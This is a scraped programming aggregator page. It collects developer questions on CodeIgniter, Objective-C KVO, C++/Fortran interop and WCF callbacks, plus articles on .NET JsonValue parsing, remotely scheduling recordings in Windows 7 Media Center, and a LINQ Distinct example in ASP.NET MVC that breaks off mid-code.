    I have a working controller and library function, but I now need to pass a URI segment to the library for decision making, and I'm stuck. Controller: function survey($method) { $id = $this->session->userdata('id'); $data['member'] = $this->home_model->getUser($id); //Convert the db Object to a row array $data['manager'] = $data['member']->row(); $manager_id = $data['manager']->manager_id; $data['manager'] = $this->home_model->getUser($manager_id); $data['manager'] = $data['manager']->row(); if ($data['manager']->credits == '0') { flashMsg('warning',"You can't complete the assessment until your manager has purchased credit."); redirect('home','location'); } elseif ($data['manager']->test_complete == '3'){ flashMsg('warning',"You already completed the Assessment."); redirect('home','location'); } else{ $data['header'] = "Home"; $this->survey_form_processing->survey_form($this->_container,$data); } } Library: function survey_form($container) { if($method ==1){ $id = $this->CI->session->userdata('id'); // Setup fields for($i=1;$i<18;$i++){ $fields["a_".$i] = 'Question '.$i; } for($i=1;$i<17;$i++){ $fields["b_".$i] = 'Question '.$i; } $fields["company_name"] = "Company Name"; $fields['company_address'] = "company_address"; $fields['company_phone'] = "company_phone"; $fields['company_state'] = "company_state"; $fields['company_city'] = "company_city"; $fields['company_zip'] = "company_zip"; $fields['job_title'] = "job_title"; $fields['job_type'] = "job_type"; $fields['job_time'] = "job_time"; $fields['department'] = "department"; $fields['supervisor'] = "supervisor"; $fields['vision'] = "vision"; $fields['height'] = "height"; $fields['weight'] = "weight"; $fields['hand_dominance'] = "hand_dominance"; $fields['areas_of_fatigue'] = "areas_of_fatigue"; $fields['injury_review'] = "injury_review"; $fields['job_positive'] = "job_positive"; $fields['risk_factors'] = "risk_factors"; $fields['job_improvement_short'] = "job_improvement_short"; $fields['job_improvement_long'] = "job_improvement_long"; $fields["c_1"] = "Near Lift"; $fields["c_2"] = "Middle Lift"; $fields["c_3"] = "Far Lift"; $this->CI->validation->set_fields($fields); // Set Rules for($i=1;$i<18;$i++){ $rules["a_".$i]= 'hour|integer|max_length[2]'; } for($i=1;$i<17;$i++){ $rules["b_".$i]= 'hour|integer|max_length[2]'; } // Setup form default values $this->CI->validation->set_rules($rules); if ( $this->CI->validation->run() === FALSE ) { // Output any errors $this->CI->validation->output_errors(); } else { // Submit form $this->_submit(); } // Modify form, first load $this->CI->db->from('be_user_profiles'); $this->CI->db->where('user_id' , $id); $user = $this->CI->db->get(); $this->CI->db->from('be_survey'); $this->CI->db->where('user_id' , $id); $survey = $this->CI->db->get(); $user = array_merge($user->row_array(),$survey->row_array()); $this->CI->validation->set_default_value($user); // Display page $data['user'] = $user; $data['header'] = 'Risk Assessment Survey'; $data['page'] = $this->CI->config->item('backendpro_template_public') . 'form_survey'; $this->CI->load->view($container,$data); } else{ redirect('home','location'); } } My library function doesn't know what to do with Method...and I'm confused. Does it have something to do with instances in my library?

    Read the article

  • How to debug KVO

    - by user8472
    In my program I use KVO manually to observe changes to values of object properties. I receive an EXC_BAD_ACCESS signal at the following line of code inside a custom setter: [self willChangeValueForKey:@"mykey"]; The weird thing is that this happens when a factory method calls the custom setter and there should not be any observers around. I do not know how to debug this situation. Update: The way to list all registered observers is observationInfo. It turned out that there was indeed an object listed that points to an invalid address. However, I have no idea at all how it got there. Update 2: Apparently, the same object and method callback can be registered several times for a given object - resulting in identical entries in the observed object's observationInfo. When removing the registration only one of these entries is removed. This behavior is a little counter-intuitive (and it certainly is a bug in my program to add multiple entries at all), but this does not explain how spurious observers can mysteriously show up in freshly allocated objects (unless there is some caching/reuse going on that I am unaware of). Modified question: How can I figure out WHERE and WHEN an object got registered as an observer? Update 3: Specific sample code. ContentObj is a class that has a dictionary as a property named mykey. It overrides: + (BOOL)automaticallyNotifiesObserversForKey:(NSString *)theKey { BOOL automatic = NO; if ([theKey isEqualToString:@"mykey"]) { automatic = NO; } else { automatic=[super automaticallyNotifiesObserversForKey:theKey]; } return automatic; } A couple of properties have getters and setters as follows: - (CGFloat)value { return [[[self mykey] objectForKey:@"value"] floatValue]; } - (void)setValue:(CGFloat)aValue { [self willChangeValueForKey:@"mykey"]; [[self mykey] setObject:[NSNumber numberWithFloat:aValue] forKey:@"value"]; [self didChangeValueForKey:@"mykey"]; } The container class has a property contents of class NSMutableArray which holds instances of class ContentObj. It has a couple of methods that manually handle registrations: + (BOOL)automaticallyNotifiesObserversForKey:(NSString *)theKey { BOOL automatic = NO; if ([theKey isEqualToString:@"contents"]) { automatic = NO; } else { automatic=[super automaticallyNotifiesObserversForKey:theKey]; } return automatic; } - (void)observeContent:(ContentObj *)cObj { [cObj addObserver:self forKeyPath:@"mykey" options:0 context:NULL]; } - (void)removeObserveContent:(ContentObj *)cObj { [cObj removeObserver:self forKeyPath:@"mykey"]; } - (void)observeValueForKeyPath:(NSString *)keyPath ofObject:(id)object change:(NSDictionary *)change context:(void *)context { if (([keyPath isEqualToString:@"mykey"]) && ([object isKindOfClass:[ContentObj class]])) { [self willChangeValueForKey:@"contents"]; [self didChangeValueForKey:@"contents"]; } } There are several methods in the container class that modify contents. They look as follows: - (void)addContent:(ContentObj *)cObj { [self willChangeValueForKey:@"contents"]; [self observeDatum:cObj]; [[self contents] addObject:cObj]; [self didChangeValueForKey:@"contents"]; } And a couple of others that provide similar functionality to the array. They all work by adding/removing themselves as observers. Obviously, anything that results in multiple registrations is a bug and could sit somewhere hidden in these methods. My question targets strategies on how to debug this kind of situation. Alternatively, please feel free to provide an alternative strategy for implementing this kind of notification/observer pattern.

    Read the article

  • Associating an Object with other Objects and Properties of those Objects

    - by alzoid
    I am looking for some help with designing some functionality in my application. I already have something similar designed but this problem is a little different. Background: In my application we have different Modules. Data in each module can be associated to other modules. Each Module is represented by an Object in our application. Module 1 can be associated with Module 2 and Module 3. Currently I use a factory to provide the proper DAO for getting and saving this data. It looks something like this: class Module1Factory { public static Module1BridgeDAO createModule1BridgeDAO(int moduleid) { switch (moduleId) { case Module.Module2Id: return new Module1_Module2DAO(); case Module.Module3Id: return new Module1_Module3DAO(); default: return null; } } } Module1_Module2 and Module1_Module3 implement the same BridgeModule interface. In the database I have a Table for every module (Module1, Module2, Module3). I also have a bridge table for each module (they are many to many) Module1_Module2, Module1_Module3 etc. The DAO basically handles all code needed to manage the association and retrieve its own instance data for the calling module. Now when we add new modules that associate with Module1 we simply implement the ModuleBridge interface and provide the common functionality. New Development We are adding a new module that will have the ability to be associated with other Modules as well as specific properties of that module. The module is basically providing the user the ability to add their custom forms to our other modules. That way they can collect additional information along with what we provide. I want to start associating my Form module with other modules and their properties. Ie if Module1 has a property Category, I want to associate an instance From data with that property. There are many Forms. If a users creates an instance of Module2, they may always want to also have certain form(s) attached to that Module2 instance. If they create an instance of Module2 and select Category 1, then I may want additional Form(s) created. I prototyped something like this: Form FormLayout (contains the labels and gui controls) FormModule (associates a form with all instances of a module) Form Instance (create an instance of a form to be filled out) As I thought about it I was thinking about making a new FormModule table/class/dao for each Module and Property that I add. So I might have: FormModule1 FormModule1Property1 FormModule1Property2 FormModule1Property3 FormModule1Property4 FormModule2 FormModule3 FormModule3Property1 Then as I did previously, I would use a factory to get the proper DAO for dealing with all of these. I would hand it an array of ids representing different modules and properties and it would return all of the DAOs that I need to call getForms(). Which in turn would return all of the forms for that particular bridge. Some points This will be for a new module so I dont need to expand on the factory code I provided. I just wanted to show an example of what I have done in the past. The new module can be associated with: Other Modules (ie globally for any instance of that module data), Other module properties (ie only if the Module instance has a certian value in one of its properties) I want to make it easy for developers to add associations with other modules and properties easily Can any one suggest any design patterns or strategy's for achieving this? If anything is unclear please let me know. Thank you, Al

    Read the article

  • C++ class functions calling fortran subroutine

    - by user2863626
    Okay so I am trying to make my code work. It is a simple C++ program with a class "CArray". This class has 2 properties, the array size, and the value. I want the main C++ program to create two instances of the class CArray. In the class CArray, I have a function called "AddArray( CArray )" where it adds another array to the current array. The problem I am stuck with, is that I want the function "AddArray" to add the two arrays in fortran. I know, much more complicated, but that is what I need. I am having issues with linking the two inside the class code. #include <iostream> using namespace std; class CArray { public: CArray(); ~CArray(); int Size; int* Val; void SetSize( int ); void SetValues(); void GetArray(); extern "C" { void Add( int*, int*, int*, int*); void Subtract( int*, int*, int*, int*); void Muliply( int*, int*, int *, int* ); } void AddArray( CArray ); void SubtractArray( CArray ); void MultiplyArray( CArray ); }; Also here is the CArray function file. #include "Array.h" #include <iostream> using namespace std; CArray::CArray() { } CArray::~CArray() { } void CArray::SetSize( int s ) { Size = s; for ( int i=0; i<s; i++ ) { Val = new int[Size]; } } void CArray::SetValues() { for ( int i=0; i<Size; i++ ) { cout << "Element " << i+1 << ": "; cin >> Val[i]; } } void CArray::GetArray() { for ( int i=0; i<Size; i++ ) { cout << Val[i] << " "; } } void CArray::AddArray( CArray a ) { if ( Size == a.Size ) { Add(&Val, &a.Val); } else { cout << "Array dimensions do not agree!" << endl; } } void CArray::SubtractArray( CArray a ) { Subtract( &Val, &a, &Size, &a.Size); GetArray(); } Here is my Fortran code. module SubtractArrays use ico_c_binding implicit none contains subroutine Subtract(a,b,s1,s2) bind(c,name='Subtract') integer s1,s2 integer a(s1),b(s2) if ( s1.eq.s2 ) do i=1,s1 a(i) = a(i) - b(i) end return end end If someone could just help me with setting me up to send arrays of integers from C++ classes to fortran I would greatly appreciate it! Thank you, Josh Derrick

    Read the article

  • Serious problem with WCF, GridViews, Callbacks and ExecuteReaders exceptions.

    - by barjed
    Hi, I have this problem that is driving me insane. I have a project to deliver before Thursday. Basically an app consiting of three components that communicate with each other in WCF. I have one console app and one Windows Forms app. The console app is a server that's connected to the database. You can add records to it via the Windows Forms client that connectes with the server through the WCF. The code for the client: namespace BankAdministratorClient { [CallbackBehavior(ConcurrencyMode = ConcurrencyMode.Single, UseSynchronizationContext = false)] public partial class Form1 : Form, BankServverReference.BankServerCallback { private BankServverReference.BankServerClient server = null; private SynchronizationContext interfaceContext = null; public Form1() { InitializeComponent(); interfaceContext = SynchronizationContext.Current; server = new BankServverReference.BankServerClient(new InstanceContext(this), "TcpBinding"); server.Open(); server.Subscribe(); refreshGridView(""); } public void refreshClients(string s) { SendOrPostCallback callback = delegate(object state) { refreshGridView(s); }; interfaceContext.Post(callback, s); } public void refreshGridView(string s) { try { userGrid.DataSource = server.refreshDatabaseConnection().Tables[0]; } catch (Exception ex) { MessageBox.Show(ex.ToString()); } } private void buttonAdd_Click(object sender, EventArgs e) { server.addNewAccount(Int32.Parse(inputPIN.Text), Int32.Parse(inputBalance.Text)); } private void Form1_FormClosing(object sender, FormClosingEventArgs e) { try { server.Unsubscribe(); server.Close(); }catch{} } } } The code for the server: namespace SSRfinal_tcp { class Program { static void Main(string[] args) { Console.WriteLine(MessageHandler.dataStamp("The server is starting up")); using (ServiceHost server = new ServiceHost(typeof(BankServer))) { server.Open(); Console.WriteLine(MessageHandler.dataStamp("The server is running")); Console.ReadKey(); } } } [ServiceBehavior(ConcurrencyMode = ConcurrencyMode.Single, InstanceContextMode = InstanceContextMode.PerCall, IncludeExceptionDetailInFaults = true)] public class BankServer : IBankServerService { private static DatabaseLINQConnectionDataContext database = new DatabaseLINQConnectionDataContext(); private static List<IBankServerServiceCallback> subscribers = new List<IBankServerServiceCallback>(); public void Subscribe() { try { IBankServerServiceCallback callback = OperationContext.Current.GetCallbackChannel<IBankServerServiceCallback>(); if (!subscribers.Contains(callback)) subscribers.Add(callback); Console.WriteLine(MessageHandler.dataStamp("A new Bank Administrator has connected")); } catch { Console.WriteLine(MessageHandler.dataStamp("A Bank Administrator has failed to connect")); } } public void Unsubscribe() { try { IBankServerServiceCallback callback = OperationContext.Current.GetCallbackChannel<IBankServerServiceCallback>(); if (subscribers.Contains(callback)) subscribers.Remove(callback); Console.WriteLine(MessageHandler.dataStamp("A Bank Administrator has been signed out from the connection list")); } catch { Console.WriteLine(MessageHandler.dataStamp("A Bank Administrator has failed to sign out from the connection list")); } } public DataSet refreshDatabaseConnection() { var q = from a in database.GetTable<Account>() select a; DataTable dt = q.toTable(rec => new object[] { q }); DataSet data = new DataSet(); data.Tables.Add(dt); Console.WriteLine(MessageHandler.dataStamp("A Bank Administrator has requested a database data listing refresh")); return data; } public void addNewAccount(int pin, int balance) { Account acc = new Account() { PIN = pin, Balance = balance, IsApproved = false }; database.Accounts.InsertOnSubmit(acc); database.SubmitChanges(); database.addNewAccount(pin, balance, false); subscribers.ForEach(delegate(IBankServerServiceCallback callback) { callback.refreshClients("New operation is pending approval."); }); } } } This is really simple and it works for a single window. However, when you open multiple instances of the client window and try to add a new record, the windows that is performing the insert operation crashes with the ExecuteReader error and the " requires an open and available connection. the connection's current state is connecting" bla bla stuff. I have no idea what's going on. Please advise.

    Read the article

  • Dynamic JSON Parsing in .NET with JsonValue

    - by Rick Strahl
    So System.Json has been around for a while in Silverlight, but it's relatively new for the desktop .NET framework and now moving into the lime-light with the pending release of ASP.NET Web API which is bringing a ton of attention to server side JSON usage. The JsonValue, JsonObject and JsonArray objects are going to be pretty useful for Web API applications as they allow you dynamically create and parse JSON values without explicit .NET types to serialize from or into. But even more so I think JsonValue et al. are going to be very useful when consuming JSON APIs from various services. Yes I know C# is strongly typed, why in the world would you want to use dynamic values? So many times I've needed to retrieve a small morsel of information from a large service JSON response and rather than having to map the entire type structure of what that service returns, JsonValue actually allows me to cherry pick and only work with the values I'm interested in, without having to explicitly create everything up front. With JavaScriptSerializer or DataContractJsonSerializer you always need to have a strong type to de-serialize JSON data into. Wouldn't it be nice if no explicit type was required and you could just parse the JSON directly using a very easy to use object syntax? That's exactly what JsonValue, JsonObject and JsonArray accomplish using a JSON parser and some sweet use of dynamic sauce to make it easy to access in code. Creating JSON on the fly with JsonValue Let's start with creating JSON on the fly. It's super easy to create a dynamic object structure. JsonValue uses the dynamic  keyword extensively to make it intuitive to create object structures and turn them into JSON via dynamic object syntax. Here's an example of creating a music album structure with child songs using JsonValue:[TestMethod] public void JsonValueOutputTest() { // strong type instance var jsonObject = new JsonObject(); // dynamic expando instance you can add properties to dynamic album = jsonObject; album.AlbumName = "Dirty Deeds Done Dirt Cheap"; album.Artist = "AC/DC"; album.YearReleased = 1977; album.Songs = new JsonArray() as dynamic; dynamic song = new JsonObject(); song.SongName = "Dirty Deeds Done Dirt Cheap"; song.SongLength = "4:11"; album.Songs.Add(song); song = new JsonObject(); song.SongName = "Love at First Feel"; song.SongLength = "3:10"; album.Songs.Add(song); Console.WriteLine(album.ToString()); } This produces proper JSON just as you would expect: {"AlbumName":"Dirty Deeds Done Dirt Cheap","Artist":"AC\/DC","YearReleased":1977,"Songs":[{"SongName":"Dirty Deeds Done Dirt Cheap","SongLength":"4:11"},{"SongName":"Love at First Feel","SongLength":"3:10"}]} The important thing about this code is that there's no explicitly type that is used for holding the values to serialize to JSON. I am essentially creating this value structure on the fly by adding properties and then serialize it to JSON. This means this code can be entirely driven at runtime without compile time restraints of structure for the JSON output. Here I use JsonObject() to create a new object and immediately cast it to dynamic. JsonObject() is kind of similar in behavior to ExpandoObject in that it allows you to add properties by simply assigning to them. Internally, JsonValue/JsonObject these values are stored in pseudo collections of key value pairs that are exposed as properties through the DynamicObject functionality in .NET. The syntax gets a little tedious only if you need to create child objects or arrays that have to be explicitly defined first. Other than that the syntax looks like normal object access sytnax. Always remember though these values are dynamic - which means no Intellisense and no compiler type checking. It's up to you to ensure that the values you create are accessed consistently and without typos in your code. Note that you can also access the JsonValue instance directly and get access to the underlying type. This means you can assign properties by string, which can be useful for fully data driven JSON generation from other structures. Below you can see both styles of access next to each other:// strong type instance var jsonObject = new JsonObject(); // you can explicitly add values here jsonObject.Add("Entered", DateTime.Now); // expando style instance you can just 'use' properties dynamic album = jsonObject; album.AlbumName = "Dirty Deeds Done Dirt Cheap"; JsonValue internally stores properties keys and values in collections and you can iterate over them at runtime. You can also manipulate the collections if you need to to get the object structure to look exactly like you want. Again, if you've used ExpandoObject before JsonObject/Value are very similar in the behavior of the structure. Reading JSON strings into JsonValue The JsonValue structure supports importing JSON via the Parse() and Load() methods which can read JSON data from a string or various streams respectively. Essentially JsonValue includes the core JSON parsing to turn a JSON string into a collection of JsonValue objects that can be then referenced using familiar dynamic object syntax. Here's a simple example:[TestMethod] public void JsonValueParsingTest() { var jsonString = @"{""Name"":""Rick"",""Company"":""West Wind"",""Entered"":""2012-03-16T00:03:33.245-10:00""}"; dynamic json = JsonValue.Parse(jsonString); // values require casting string name = json.Name; string company = json.Company; DateTime entered = json.Entered; Assert.AreEqual(name, "Rick"); Assert.AreEqual(company, "West Wind"); } The JSON string represents an object with three properties which is parsed into a JsonValue object and cast to dynamic. Once cast to dynamic I can then go ahead and access the object using familiar object syntax. Note that the actual values - json.Name, json.Company, json.Entered - are actually of type JsonPrimitive and I have to assign them to their appropriate types first before I can do type comparisons. The dynamic properties will automatically cast to the right type expected as long as the compiler can resolve the type of the assignment or usage. The AreEqual() method oesn't as it expects two object instances and comparing json.Company to "West Wind" is comparing two different types (JsonPrimitive to String) which fails. So the intermediary assignment is required to make the test pass. The JSON structure can be much more complex than this simple example. Here's another example of an array of albums serialized to JSON and then parsed through with JsonValue():[TestMethod] public void JsonArrayParsingTest() { var jsonString = @"[ { ""Id"": ""b3ec4e5c"", ""AlbumName"": ""Dirty Deeds Done Dirt Cheap"", ""Artist"": ""AC/DC"", ""YearReleased"": 1977, ""Entered"": ""2012-03-16T00:13:12.2810521-10:00"", ""AlbumImageUrl"": ""http://ecx.images-amazon.com/images/I/61kTaH-uZBL._AA115_.jpg"", ""AmazonUrl"": ""http://www.amazon.com/gp/product/B00008BXJ4/ref=as_li_ss_tl?ie=UTF8&tag=westwindtechn-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=B00008BXJ4"", ""Songs"": [ { ""AlbumId"": ""b3ec4e5c"", ""SongName"": ""Dirty Deeds Done Dirt Cheap"", ""SongLength"": ""4:11"" }, { ""AlbumId"": ""b3ec4e5c"", ""SongName"": ""Love at First Feel"", ""SongLength"": ""3:10"" }, { ""AlbumId"": ""b3ec4e5c"", ""SongName"": ""Big Balls"", ""SongLength"": ""2:38"" } ] }, { ""Id"": ""67280fb8"", ""AlbumName"": ""Echoes, Silence, Patience & Grace"", ""Artist"": ""Foo Fighters"", ""YearReleased"": 2007, ""Entered"": ""2012-03-16T00:13:12.2810521-10:00"", ""AlbumImageUrl"": ""http://ecx.images-amazon.com/images/I/41mtlesQPVL._SL500_AA280_.jpg"", ""AmazonUrl"": ""http://www.amazon.com/gp/product/B000UFAURI/ref=as_li_ss_tl?ie=UTF8&tag=westwindtechn-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=B000UFAURI"", ""Songs"": [ { ""AlbumId"": ""67280fb8"", ""SongName"": ""The Pretender"", ""SongLength"": ""4:29"" }, { ""AlbumId"": ""67280fb8"", ""SongName"": ""Let it Die"", ""SongLength"": ""4:05"" }, { ""AlbumId"": ""67280fb8"", ""SongName"": ""Erase/Replay"", ""SongLength"": ""4:13"" } ] }, { ""Id"": ""7b919432"", ""AlbumName"": ""End of the Silence"", ""Artist"": ""Henry Rollins Band"", ""YearReleased"": 1992, ""Entered"": ""2012-03-16T00:13:12.2800521-10:00"", ""AlbumImageUrl"": ""http://ecx.images-amazon.com/images/I/51FO3rb1tuL._SL160_AA160_.jpg"", ""AmazonUrl"": ""http://www.amazon.com/End-Silence-Rollins-Band/dp/B0000040OX/ref=sr_1_5?ie=UTF8&qid=1302232195&sr=8-5"", ""Songs"": [ { ""AlbumId"": ""7b919432"", ""SongName"": ""Low Self Opinion"", ""SongLength"": ""5:24"" }, { ""AlbumId"": ""7b919432"", ""SongName"": ""Grip"", ""SongLength"": ""4:51"" } ] } ]"; dynamic albums = JsonValue.Parse(jsonString); foreach (dynamic album in albums) { Console.WriteLine(album.AlbumName + " (" + album.YearReleased.ToString() + ")"); foreach (dynamic song in album.Songs) { Console.WriteLine("\t" + song.SongName ); } } Console.WriteLine(albums[0].AlbumName); Console.WriteLine(albums[0].Songs[1].SongName);}   It's pretty sweet how easy it becomes to parse even complex JSON and then just run through the object using object syntax, yet without an explicit type in the mix. In fact it looks and feels a lot like if you were using JavaScript to parse through this data, doesn't it? And that's the point…© Rick Strahl, West Wind Technologies, 2005-2012Posted in .NET  Web Api  JSON   Tweet !function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs"); (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = 'https://apis.google.com/js/plusone.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })();

    Read the article

  • Remotely Schedule and Stream Recorded TV in Windows 7 Media Center

    - by DigitalGeekery
    Have you ever been away from home and suddenly realized you forgot to record your favorite program? Now Windows 7 Media Center, users can schedule recordings remotely from their phones or mobile devices with Remote Potato. How it Works Remote Potato installs server software on the host computer running Windows 7 Media Center. Once the software is installed, we’ll need to do some port forwarding on the router and setup an optional dynamic DNS address. When setup is completed, we will access the application through a web based interface. Silverlight is required for Streaming recorded TV, but scheduling recordings can be done through an HTML interface. Installing Remote Potato Download and install Remote Potato on the Media Center PC. (See download link below) If you plan to stream any Recorded TV, you’ll also want to install the streaming pack located on the same page. It isn’t required to stream all shows, only shows that require the AC3 audio codec. Click Yes to allow Remote Potato to add rules to the Windows Firewall for remote access. You’ll likely need to accept a few UAC prompts. When notified that the rules were added, click OK. Remote Potato will then prompt you to allow administrator privileges to reserve a URL for it’s web server. Click Yes. Remote Potato server will start. Click on the configuration button at the right to to reveal the settings tabs.   One the General tab, you’ll have the option to run Remote Potato on startup and minimized in the System Tray. If you’re running Media Center on a dedicated HTPC, you’ll probably want to enable both startup options. Forwarding Ports on Your Router You’ll need to forward a couple ports on your router. By default, these will be ports 9080 and 9081. In this example we’re using a Linksys WRT54GL router, however, the steps for port forwarding will vary from router to router. On the Linksys configuration page, click on the Applications & Gaming Tab, and then the Port Range Forward tab. Under Application, type in a name of your choosing. In both the Start and End boxes, type the port number 9080. Enter the local IP address of your Media Center computer in the IP address column. Click the check box under Enable. Repeat the process on the next line, but this time use port 9081. When finished, click the Save Settings button. Note: It’s highly recommended that you configure the home computer running Media Center & Remote Potato with a static IP address.   Find your IP Address You’ll need to find the IP address assigned to your router from your ISP. There are many ways to do this but a quick and easy way is to visit a site like checkip.dyndns.org (link available below) The current external IP address of your router will be displayed in the browser.   Dynamic DNS This is an optional step, but  it’s highly recommended. Many routers, such as the Linksys WRT54GL we are using, support Dynamic DNS (DDNS). What Dynamic DNS allows you to do is affiliate your home router’s external IP address to a domain name. Every time your home router is assigned a a new IP address by your ISP, the domain name is updated to point to your new IP address. Remote Potato’s user interface is accessed over the Internet is by connecting to your router’s IP address followed by a colon and the port number. (Ex: XXX.XXX.XXX.XXX:9080) Instead of constantly having to look up and remember an IP address, you can use DDNS along with a 3rd party provider like DynDNS.com, to sign up for a free domain name and configure it to be updated each time your router is assigned a new IP address. Go to the DynDNS.com website (See link at the end of the article) and sign up for a free Domain name. You’ll need to register and confirm by email.   Once you’ve signed in and selected your domain name click Activate Services. You’ll get a confirmation message that your domain name has been activated.    On the Linksys WRT54GL click on the Setup tab an then DDNS. Select DynDNS.org, or TZO.com if you prefer to use their service, from the drop down list.   With DynDNS, you’ll need to fill in your username and password you signed up with at the DynDNS website and the hostname you chose. Note: You can connect over your local network with the IP Address of the computer running Remote Potato followed by a colon and the port number. Ex: 192.168.1.2:9080 Logging in Remote Potato and Recording a Show Once you connect, you’ll see the start page. To view the TV listings, click on TV Guide. You’ll then see your guide listings. There are a few ways to navigate the listings. At the top left, you can click on any of the preset time buttons to jump to  the listings at that time of the day.  Click on the arrows to the right and left of the day and date at the top center to proceed to the previous or next day. Or, jump to a specific day with the date and date buttons at the top right.   To setup a recording, click on a program.   You can choose to record the individual show or the entire series by clicking on Record Show or Record Series.   Remote Potato on Mobile Devices Perhaps the coolest feature of Remote Potato is the ability to schedule recording from your phone or mobile device. Note: For any devices or computers without Silverlight, you will be prompted to view the HTML page. Select Browse Listings. Select your program to record. In the Program Details, select Record Show to record the single episode or Record Series to record all instances of the series. You will then see a red dot on the program listing to indicate that the show is scheduled for recording.   Streaming Recorded TV Click on Recorded TV from the home screen to access your previously recorded TV programs. Click on the selection you wish to stream. Click on Play. If you receive this error message, you’ll need to install the streaming pack for Remote Potato. This is found on the same download page as installation files. (See link below) The Begin from slider allows you to start playback from the start (by default) or a different time of the program by moving the slider. The Quality (bitrate) setting  allows you to choose the quality of the playback. We found the video quality on the Normal setting to be pretty lousy, and Low was just pointless. High was the best overall viewing experience as it provided smooth quality video playback. We experienced significant stuttering during playback using the Ultra High setting.   Click Start when you are ready to begin. When playback begins you’ll see a slider at the top right.   Move the slider left or right to increase or decrease the size of the video. There’s also a button to switch to full screen.   Media Center users who travel frequently or are always on the go will likely find Remote Potato to be a blessing. Since being released earlier this year, updates for Remote Potato have come fast and furious. The latest beta release includes support for streaming music and photos. If you like those nice network TV logos, check out our article on adding TV channel logos to Windows Media Center. Downloads and Links Download Remote Potato and Streaming Pack Find your IP address Sign Up for a Domain Name at DynDNS.com Similar Articles Productive Geek Tips Schedule Updates for Windows Media CenterUsing Netflix Watchnow in Windows Vista Media Center (Gmedia)Add a Sleep Timer to Windows 7 Media CenterStartup Customizations for Media Center in Windows 7Enable Media Streaming in Windows Home Server to Windows Media Player TouchFreeze Alternative in AutoHotkey The Icy Undertow Desktop Windows Home Server – Backup to LAN The Clear & Clean Desktop Use This Bookmarklet to Easily Get Albums Use AutoHotkey to Assign a Hotkey to a Specific Window Latest Software Reviews Tinyhacker Random Tips DVDFab 6 Revo Uninstaller Pro Registry Mechanic 9 for Windows PC Tools Internet Security Suite 2010 FoxClocks adds World Times in your Statusbar (Firefox) Have Fun Editing Photo Editing with Citrify Outlook Connector Upgrade Error Gadfly is a cool Twitter/Silverlight app Enable DreamScene in Windows 7 Microsoft’s “How Do I ?” Videos

    Read the article

  • Using LINQ Distinct: With an Example on ASP.NET MVC SelectListItem

    - by Joe Mayo
    One of the things that might be surprising in the LINQ Distinct standard query operator is that it doesn’t automatically work properly on custom classes. There are reasons for this, which I’ll explain shortly. The example I’ll use in this post focuses on pulling a unique list of names to load into a drop-down list. I’ll explain the sample application, show you typical first shot at Distinct, explain why it won’t work as you expect, and then demonstrate a solution to make Distinct work with any custom class. The technologies I’m using are  LINQ to Twitter, LINQ to Objects, Telerik Extensions for ASP.NET MVC, ASP.NET MVC 2, and Visual Studio 2010. The function of the example program is to show a list of people that I follow.  In Twitter API vernacular, these people are called “Friends”; though I’ve never met most of them in real life. This is part of the ubiquitous language of social networking, and Twitter in particular, so you’ll see my objects named accordingly. Where Distinct comes into play is because I want to have a drop-down list with the names of the friends appearing in the list. Some friends are quite verbose, which means I can’t just extract names from each tweet and populate the drop-down; otherwise, I would end up with many duplicate names. Therefore, Distinct is the appropriate operator to eliminate the extra entries from my friends who tend to be enthusiastic tweeters. The sample doesn’t do anything with the drop-down list and I leave that up to imagination for what it’s practical purpose could be; perhaps a filter for the list if I only want to see a certain person’s tweets or maybe a quick list that I plan to combine with a TextBox and Button to reply to a friend. When the program runs, you’ll need to authenticate with Twitter, because I’m using OAuth (DotNetOpenAuth), for authentication, and then you’ll see the drop-down list of names above the grid with the most recent tweets from friends. Here’s what the application looks like when it runs: As you can see, there is a drop-down list above the grid. The drop-down list is where most of the focus of this article will be. There is some description of the code before we talk about the Distinct operator, but we’ll get there soon. This is an ASP.NET MVC2 application, written with VS 2010. Here’s the View that produces this screen: <%@ Page Language="C#" MasterPageFile="~/Views/Shared/Site.Master" Inherits="System.Web.Mvc.ViewPage<TwitterFriendsViewModel>" %> <%@ Import Namespace="DistinctSelectList.Models" %> <asp:Content ID="Content1" ContentPlaceHolderID="TitleContent" runat="server">     Home Page </asp:Content><asp:Content ID="Content2" ContentPlaceHolderID="MainContent" runat="server">     <fieldset>         <legend>Twitter Friends</legend>         <div>             <%= Html.DropDownListFor(                     twendVM => twendVM.FriendNames,                     Model.FriendNames,                     "<All Friends>") %>         </div>         <div>             <% Html.Telerik().Grid<TweetViewModel>(Model.Tweets)                    .Name("TwitterFriendsGrid")                    .Columns(cols =>                     {                         cols.Template(col =>                             { %>                                 <img src="<%= col.ImageUrl %>"                                      alt="<%= col.ScreenName %>" />                         <% });                         cols.Bound(col => col.ScreenName);                         cols.Bound(col => col.Tweet);                     })                    .Render(); %>         </div>     </fieldset> </asp:Content> As shown above, the Grid is from Telerik’s Extensions for ASP.NET MVC. The first column is a template that renders the user’s Avatar from a URL provided by the Twitter query. Both the Grid and DropDownListFor display properties that are collections from a TwitterFriendsViewModel class, shown below: using System.Collections.Generic; using System.Web.Mvc; namespace DistinctSelectList.Models { /// /// For finding friend info on screen /// public class TwitterFriendsViewModel { /// /// Display names of friends in drop-down list /// public List FriendNames { get; set; } /// /// Display tweets in grid /// public List Tweets { get; set; } } } I created the TwitterFreindsViewModel. The two Lists are what the View consumes to populate the DropDownListFor and Grid. Notice that FriendNames is a List of SelectListItem, which is an MVC class. Another custom class I created is the TweetViewModel (the type of the Tweets List), shown below: namespace DistinctSelectList.Models { /// /// Info on friend tweets /// public class TweetViewModel { /// /// User's avatar /// public string ImageUrl { get; set; } /// /// User's Twitter name /// public string ScreenName { get; set; } /// /// Text containing user's tweet /// public string Tweet { get; set; } } } The initial Twitter query returns much more information than we need for our purposes and this a special class for displaying info in the View.  Now you know about the View and how it’s constructed. Let’s look at the controller next. The controller for this demo performs authentication, data retrieval, data manipulation, and view selection. I’ll skip the description of the authentication because it’s a normal part of using OAuth with LINQ to Twitter. Instead, we’ll drill down and focus on the Distinct operator. However, I’ll show you the entire controller, below,  so that you can see how it all fits together: using System.Linq; using System.Web.Mvc; using DistinctSelectList.Models; using LinqToTwitter; namespace DistinctSelectList.Controllers { [HandleError] public class HomeController : Controller { private 